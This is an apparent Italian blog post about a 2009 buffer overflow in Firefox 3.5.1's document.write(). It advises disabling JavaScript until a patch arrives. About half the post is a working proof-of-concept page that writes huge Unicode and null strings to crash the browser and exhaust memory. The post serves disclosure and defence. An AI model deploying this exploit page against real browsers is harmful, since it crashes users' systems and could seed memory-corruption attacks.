Dopo solo 4 giorni dalla scoperta della vulnerabilità di Tracemonkey, è stata subito trovata una nuova vulnerabilità su Firefox 3.5.1 definita critica da IBM Internet Security Services e da National Vulnerability Database. Questa volta è possibile sfruttare un buffer overflow che tramite il linguaggio JavaScript, è possibile passare al metodo document.write() una stringa Unicode(la dimensine di ogni carattere è di 2
byte) abbastanza lunga da causare anche l'esaurimento della memoria del calcolatore. Mozilla foundation non ha ancora rilasciato una patch, e per il momento consiglio di disabilitare JavaScript fino a quando non verrà risolto il problema. Per disabilitare JavaScript è possibile farlo aggiungendo questo add-ons per firefox reperibile su: https://addons.mozilla.org/it/firefox/addon/722
Exploit esempio:
<html>
<head>
<script language="JavaScript" type="Text/Javascript">
var str = unescape("%u4141%u4141");
var str2 = unescape("%u0000%u0000");
var finalstr2 = mul8(str2, 49000000);
var finalstr = mul8(str, 21000000);
document.write(finalstr2);
document.write(finalstr);
function mul8 (str, num) {
var i = Math.ceil(Math.log(num) / Math.LN2),
res = str;
do {
res += res;
} while (0 < --i);
return res.slice(0, str.length * num);
}
</script>
</head>
<body>
</body>
</html>
<html><body></body></html>
Nessun commento:
Posta un commento